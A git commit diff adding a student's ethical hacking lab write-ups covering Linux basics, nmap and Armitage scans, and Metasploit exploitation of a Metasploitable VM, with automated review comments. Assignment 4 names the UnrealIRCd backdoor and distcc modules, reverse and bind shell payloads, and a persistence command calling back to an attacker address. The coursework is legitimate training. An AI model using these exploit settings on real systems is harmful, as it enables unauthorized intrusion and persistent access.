Pretty much all of Fall 2024

This commit is contained in:
Aidan Sharpe
2024-11-10 14:46:30 -05:00
parent 87f9c55360
commit faa05b88f9
116 changed files with 8295 additions and 1683 deletions


@ -0,0 +1,49 @@
# Ethical Hacking in ECE Assignment 2 - Aidan Sharpe
## Assignment Tasks
### Task 1
Create a directory named `ethics_lab` and manage files within it using commands like `mkdir`, `cd`, `mv`, and `touch`.
![](file_management.png)
Create a directory called `ethics_lab` using the `mkdir` command. Then navigate to `ethics_lab` using `cd`. Create three files (`file1`, `file2`, and `file3`) using the `touch` command. Show the contents of the `ethics_lab` directory using `ls`. Write the text "hello" into `file3` using echo and the write to file symbol (`>`). Print the contents of `file3` to the terminal using the `cat` command.
### Task 2
Monitor and manage processes on your system using tools like `ps`, `top`, and `kill`. Identify and terminate a process.
![](top.png)
View an active, sorted list of all tasks running on the system using `top`.
![](task_tools.png)
List all tasks running on the system using `ps -e` then pass the output into `grep` and filter for the text "fox". This shows the information for the firefox-esr task. The number at the beginning of the line is the process identifier, and the process can be ended by executing `kill` followed by that process ID.
### Task 3
Use `ifconfig`/`ip a`, `ping`, and `netstat`.
![](network.png)
Running `ip a` shows IP address information. For example, we can see that the current IP address is `192.168.56.101`. We also ran this command on another virtual machine and found that its IP address was `192.168.56.102`, so we can ping it using `ping` to see if a connection can be established. Running`netstat` shows a list of network connections.
### Task 4
Set up a second VM and connect to it using `ssh`.
![](ssh.png)
Prior to running the command, a host configuration was created called `msf`. This contained the known ip address and the preferred key algorithm. The command `ssh msfadmin@msf` creates a login tunnel for the user account `msfadmin` between the host and remote system.
### Task 5
Configure the firewall using `ufw`. Enable the firewall and allow SSH traffic.
![](firewall.png)
## Reflection
Learning basic Linux command is an important skill for ethical hacking for multiple reasons.
### Reason 1 - Most Ethical Hacking Tools Run on Linux
Most ethical hacking tools run on or are designed specifically for Linux machines. Knowing how to better use the machines that your tools are running on is always advantageous.
### Reason 2 - Most Servers Run Linux
Since over 90% of the servers on the internet run Linux, that means that most databases (the places where pretty much all valuable information is stored) are hosted on Linux-based servers. By being familiar with basic Linux commands, navigating remote server file systems becomes a much easier task.
### Skills Gained from This Assignment
One skill I learned from this assignment is forcing a specific key algorithm for different hosts. While I have used SSH many times in the past, I was not aware that different machines restricted the type of keys used. Frankly, I thought they all used the same type of key. After completing this exercises, I am now practiced in the configuration of host key algorithms.
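Review bot: Task 5 has a heading, the task statement and `firewall.png` but no write-up, unlike Tasks 1 to 4, so the `ufw` commands that were run and the resulting rules are not recorded anywhere in text. Add the commands and the status output as text, and state the order used, since enabling the firewall before the SSH allow rule exists can cut off the session from Task 4. Task 1 lists `mv` among the commands, but the description never uses it. In Task 4, "creates a login tunnel" is loose wording for opening an SSH session, and the `msf` host configuration is described but not shown; include that entry so the key-algorithm setting the Reflection refers to is visible, and keep the setting scoped to that host rather than making it a global default. Smaller items: "Running`netstat`" is missing a space, "basic Linux command is" and "this exercises" need number agreement, the "over 90% of the servers" figure has no source, and every image has empty alt text.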

Binary file not shown.



@ -0,0 +1,36 @@
# Ethical Hacking Assignment 3 - Aidan Sharpe
## Task 1 - Network Configuration Between Kali and Metasploitable
Ensure proper network connectivity between the attacker (Kali Linux) and victim (Metasploitable) virtual machines.
1. Configure both Kali Linux and Metasploitable VMs to use host-only adapters
![](kali-network.png)
![](metasploitable-network.png)
2. Verify the network connectivity by pinging Metasploitable from Kali Linux
![](ping.png)
## Task 2 - Nmap Scan for Open Ports and Vulnerabilities
Use `nmap` to perform a vulnerability scan of the metasploitable machine.
![](nmap.png)
## Task 3 - Installing and Launching Armitage
Install Armitage and set it up to connect with the Metasploit framework.
![](armitage-running.png)
## Task 4 - Perform a Vulnerability Scan with Armitage
Use Armitage to scan the Metasploitable machine and identify potential vulnerabilities.
![](armitage-scan.png)
## Task 5 - Exploiting a Vulnerability Using Armitage
Use Armitage to exploit a vulnerability on the Metasploitable machine and gain access.
![](ftp-exploit.png)
## Reflection
The `nmap` tool is suprisingly easy, yet very powerful. After using it on this assignment, I used it to learn about vulnerabilities on my home server. I found that I had ports 80, 443, and 22 open. I did not realize that I had left it open, and I couldn't remembery why I had it open in the first place. I then used a remote network configuration tool to close port 80. After running `nmap` again, I saw that I had successfully closed the port.
I really enjoyed using Armitage as an easy introduction to the Metasploit Framework. At this point, I really only plan to use it as a learning tool to get used to deploying attacks and scanning networks. Today, for example, I learned about scanning IP ranges. My next step is to switch to the metasploit CLI.
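Review bot: Tasks 2 through 5 record their results only as screenshots, so the write-up never states which `nmap` options were used in Task 2 or which service and vulnerability Task 5 went after (the only hint is the file name `ftp-exploit.png`). Add one or two sentences per task naming the command, the target address and the finding, as the Assignment 2 write-up does for its tasks. In the Reflection, "I did not realize that I had left it open" follows a list of three ports (80, 443 and 22), so "it" is ambiguous until the later mention of closing port 80; name the port at that point, and say whether 443 and 22 are exposed on purpose. Typos: "suprisingly" and "remembery". "metasploitable" in Task 2 and "metasploit CLI" in the last line are lower-case, while the rest of the file capitalizes both names.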

Binary file not shown.



@ -0,0 +1,51 @@
# Ethical Hacking Assignment 4 - Aidan Sharpe
## Network Configuration
To establish a connection between the two boxes, proper network configuration is required. The virtual machines (attacker and victim) were set to 'Host-Only Adapter' as seen below.
![](attacker-network.png)
Attacker Network Configuration
![](victim-network.png)
Victim Network Configuration
To confirm a proper setup, the attacker pinged the victim and viewed its open ports using the `ping` and `nmap` commands on the victim's IP address (`192.168.56.104`).
![](victim-ping-nmap.png)
## Exploiting UnrealIRCd 3.2.8.1 Backdoor
Now that a proper connection has been confirmed, we can begin exploiting the victim machine. First we started `msfconsole` as root. The exploit is chosen using `use exploit/unix/irc/unreal_ircd_3281_backdoor`. Then the remote and local host variables (RHOST and LHOST) are set to the victim and attacker IP addresses respectively. Next, a payload is chosen. In our case, we used the `cmd/unix/reverse` payload to establish a remote shell. After setting the local port (LPORT) to 4444, we began the exploit.
![](irc-exploit-attempt.png)
Unfortunately, while the exploit completed, no remote shell could be started. Looking into the options, no issues were found. Multiple payloads were tried, each yielding the same error message: "Exploit completed, but no session was created." That is until we deployed the payload, `cmd/unix/bind_perl`. Finally, we established a remote shell connection!
![](irc-exploit-success.png)
## Exploiting the DistCC Daemon
The next exploit tested was the DistCC Daemon. Switching exploits in `msfconsole` is as easy as telling it to use the name of the new exploit. In our case, with the DistCC Daemon, we used `use exploit/unix/misc/distcc_exec`. The LHOST, RHOST, and LPORT were set to be the same as before. Finally, a payload was selected. The default was `cmd/unix/reverse`, so we tested that first. Unfortunately, we ran into the same error as before "Exploit completed, but no session was created." Again, using `cmd/unix/bind_perl` as the payload instead of `cmd/unix/reverse` fixed the issue, and we successfully opened a remote shell.
![](distcc-daemon-sucess.png)
## Post Exploitation Activities
Now that a remote shell connection is established, we must gather information about and maintain our connection to the victim. We opted to learn about user and active process information.
![](meterpreter-commands.png)
While commands like `ps` and `uname -a` work in the remote shell, Meterpreter specific commands like `hashdump` and `migrate` did not work.
## Persistence
Persistence is used to easily reconnect to the victim, even after reboots. Running the command `run persistence -U -i 60 -p 4444 -r 192.166.56.101` theoretically enables this behavior. Unfortunately, the shell provided no feedback upon execution, and upon restarting Metasploitable, there were no sessions to attach to.
![](no-active-session.png)
## Reflection
Hacking is finicky, I mean *super* finicky. Success with identical setups can vary, and slightly different environments can have drastically different results. Even following the setup to the tee can create non-functional results.
Fortunately, however, there are always a handful of potential solutions if one method does not work. For example, attempting to use the `cmd/unix/reverse` was unsuccessful, but that was just one of many potential payloads. Eventually, with enough trial and error, success may be found.
Even though a successful attack was launched, the shell environment was different than expected. For example, the instructions put the attacker in a Meterpreter environment, but the successful attack put the user in a `cmd/unix` shell environment instead. While Meterpreter provides some really useful tools, the `cmd/unix` shell is much more bare bones.
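Review bot: In the Persistence section the callback address is `-r 192.166.56.101`, while the only lab address given in this file is `192.168.56.104`, so the second octet looks like a typo for 168. State which address was actually typed, because a callback aimed at a different network would by itself account for "no sessions to attach to". The section is also inconsistent with Post Exploitation Activities: `run persistence` is a Meterpreter script, and the write-up has just said that Meterpreter-specific commands "did not work" in the `cmd/unix` shell, so the lack of feedback is the expected outcome and should be explained that way rather than with "theoretically enables this behavior". The attacker's own IP address is never stated even though LHOST is set to it; give it next to the victim's in Network Configuration. The screenshot `meterpreter-commands.png` documents a session that the Reflection says was not Meterpreter, and `distcc-daemon-sucess.png` is misspelled (rename the file together with the link). In the Reflection, "to the tee" should be "to a T".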

Binary file not shown.
